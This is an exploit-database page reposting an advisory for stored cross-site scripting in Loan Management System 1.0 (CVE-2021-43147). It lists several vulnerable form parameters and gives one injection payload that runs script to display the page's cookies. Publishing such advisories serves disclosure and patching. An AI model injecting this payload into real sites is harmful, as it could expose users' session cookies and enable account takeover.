Loan Management System 1.0 Cross Site Scripting

CVE Category Price Severity
CVE-2021-43147 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2022-07-28

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Loan Management System 1.0 Cross Site Scripting
# Exploit Title: Loan Management System - Stored XSS on several parameters
# Date: 28/07/2022
# Exploit Author: saitamang
# Vendor Homepage: sourcecodester
# Software Link:
# Version: 1.0
# Tested on: Centos 7 apache2 + MySQL

There are several functions and parameter affected as below:

- firstname
- lastname

- ltype_name
- ltype_desc

- firstname
- middlename
- lastname
- address

The payload use to inject is "/><svg/onload=alert(document.cookie)>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.